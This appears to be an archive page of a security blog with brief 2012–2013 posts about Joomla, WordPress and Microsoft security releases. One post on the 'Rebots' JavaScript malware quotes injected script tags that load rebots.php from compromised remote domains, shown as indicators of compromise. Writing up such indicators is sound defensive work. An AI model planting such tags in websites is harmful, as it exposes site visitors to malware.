Joomla Version 2.5.10 Released – Security Updates

April 24, 2013 by Leave a Comment

This morning the Joomla development team released a new version of the Joomla platform. This is a Security release, so please be sure to update if you’re on the 2.x branch. If you’re on the 1.x branch the odds of updating seamlessly is highly unlikely so please do so only if you’re engaging a developer to assist you.

This release address 7 security issues, all of them appear to be low to moderate and revolve around Cross-Site Scripting (XSS), Denial of Service (DOS) and Privilege Escalation. It also contains another 38 bug fixes.

Security Fixes include:

If you can, please be sure to update, you can get your latest releases off the Joomla website here.

Filed Under: awareness, joomla, sucuri, updates Tagged With: , , ,

WordPress 3.5 Released

December 11, 2012 by 1 Comment

Update like it’s hot!

Today marks the release of WordPress 3.5 (Named Elvin after jazz drimmer Elvin Jones), a major release this year for the WordPress project.

WordPress 3.5

This release highlights some very significant changes to anything from the JavaScript libraries being used, to a brand new Media Manager. Although there are no security fixes highlighted, there were various bugs fixed along with the newly added features.


Read More

Filed Under: security, sucuri, updates, WordPress Tagged With: , , ,

WordPress 3.4.2 Released – Maintenance and Security Update!!

September 6, 2012 by 2 Comments

As many know, today the WordPress team released a new patch for WordPress 3.4.2, and have titled it a maintenance and security release.

WordPress 3.4.2 Update

By now many have regurgitated the same post in a number of different blogs and forums pushing the word out, that’s great.

It took us a bit longer because we wanted to better understand the specifics of the security release. Here is what we found:

Read More

Filed Under: security, sucuri, updates, WordPress Tagged With: , , , ,

Rebots.php JavaScript Malware Being Actively Injected

August 24, 2012 by 7 Comments

Holy JavaScript malware, Batman! On August 11th we started seeing the Rebot JavaScript malware string injected on various websites. Since then, it has increased its appearances, and has variated the way it’s being included on the infected sites.

Rebots

When you visit a compromised site, it will attempt to load an additional JavaScript, like one of these:

<script src="http://lig-limp.com.br/rebots.php"..

<script; src="http://chezbruna.com.br/imagens/rebots.php"..


Read More

Filed Under: javascript, Malware, SiteCheck, sucuri, updates, WordPress Tagged With: , , , ,

WordPress Update – 3.3.3 and 3.4.1 Patches Released!!

June 27, 2012 by 5 Comments

Well it was only a few weeks ago, but today, two new patches were released: 3.3.3 and 3.4.1.

The good news is, as they are patches, the updates should be fairly straight forward and should not cause much, if any, issues. It is important to note though that this is a Maintenance and Security release. On their official post they highlight the following items:

  • Fixes an issue where a theme’s page templates were sometimes not detected.
  • Addresses problems with some category permalink structures.
  • Better handling for plugins or themes loading JavaScript incorrectly.
  • Adds early support for uploading images on iOS 6 devices.
  • Allows for a technique commonly used by plugins to detect a network-wide activation.
  • Better compatibility with servers running certain versions of PHP (5.2.4, 5.4) or with uncommon setups (safe mode, open_basedir), which had caused warnings or in some cases prevented emails from being sent.


Read More

Filed Under: community, education, sucuri, updates, WordPress Tagged With: ,

Joomla 2.5.5 released (security update)

June 18, 2012 by Leave a Comment

Joomla 2.5.5 was just released today, with a few bugs fixed and 2 important security updates for a privilege escalation and an information disclosure issue:

1- Privilege escalation

High severity security issue, that allows unprivileged users to get admin access to a site running Joomla.

2- Information Disclosure

This is a low severity security issue that leaks internal information about the database, internal paths and PHP info.

More information about this release here: Joomla 2.5.5 released

Remember, the leading cause for web site compromises is outdated software! So as a web site owner, you have to do your part to minimize risk and keep your site (and your users) safe. Update now!

Sitecheck was also updated to alert users not running version 2.5.5 on their Joomla sites.

Filed Under: joomla, security, updates, vulnerability Tagged With: , , ,

WordPress 3.4 Released – Update, Update, Update

June 13, 2012 by 4 Comments

It’s always very easy to say to update, but the harsh reality is that although the update process has been drastically streamlined over the past few years, there are always a few challenges. Its why we have put together a post on 3 easy steps that you can take to make the process safer.

Please also take a minute to read up on WordPress 3.4 – code name Green. Also, don’t forget to take a minute to scroll through the long list of contributors and if you know one, thank them for helping make the product.

You can find a more comprehensive list of updates and features here: http://codex.wordpress.org/Version_3.4

If you have any questions feel free to contact us at info@sucuri.net.

Filed Under: sucuri, updates, WordPress Tagged With: ,

Public Service Announcement: Microsoft Security Advisory (2719165)

June 12, 2012 by 1 Comment

Today Microsoft released a security advisory to all users running the Windows operating system (OS). A new vulnerability has been identified that allows for the Microsoft XML Core Services to be exploited and used for remote code execution.

This vulnerability is known in Microsoft XML Core Service versions:

  • 3.0
  • 4.0
  • 5.0
  • 6.0

You can read more on the advisory in their post here.

Read More

Filed Under: Microsoft, sucuri, updates, vulnerability Tagged With: , , , ,

Official WordPress Plugin Directory – Forcing Plugin Updates

May 11, 2012 by 5 Comments

For some while we have wondered what happens when a plugin is removed from the official WordPress plugin directory for security reasons. Historically, we haven’t seen much of anything happen – no notification to users, no official blog post, nothing beyond the plugin disappearing from the repo. Sometimes when it did disappear, my understanding is updates were forced – certainly for the major vulnerabilities.

In an interesting move, it looks like some experimental changes have been made to help ensure users quickly learn there is a security problem.

Read More

Filed Under: community, plugin, security, sucuri, updates, vulnerability, WordPress Tagged With: , , , , ,

WordPress Security Release – Upgrade to 3.3.2 TODAY

April 20, 2012 by 10 Comments

It’s that time again, to upgrade all your WordPress installs. This morning the core team released WordPress 3.3.2 which includes security updates for three external libraries:

  • Plupload (version 1.5.4), which WordPress uses for uploading media.
  • SWFUpload, which WordPress previously used for uploading media, and may still be in use by plugins.
  • SWFObject, which WordPress previously used to embed Flash content, and may still be in use by plugins and themes.

Here are a few other bugs addressed in WordPress 3.3.2:

  • Limited privilege escalation where a site administrator could deactivate network-wide plugins when running a WordPress network under particular circumstances, disclosed by Jon Cave of our WordPress core security team, and Adam Backstrom.
  • Cross-site scripting vulnerability when making URLs clickable, by Jon Cave.
  • Cross-site scripting vulnerabilities in redirects after posting comments in older browsers, and when filtering URLs. Thanks to Mauro Gentile for responsibly disclosing these issues to the security team.

Here is the official WordPress News release on WordPress.org.

So do it, go upgrade to WordPress 3.3.2 today!

If you have questions about your site security email Sucuri Info. Make sure to run a free malware scan with Sucuri SiteCheck.

Filed Under: security, updates, WordPress Tagged With: , , ,
«Older Posts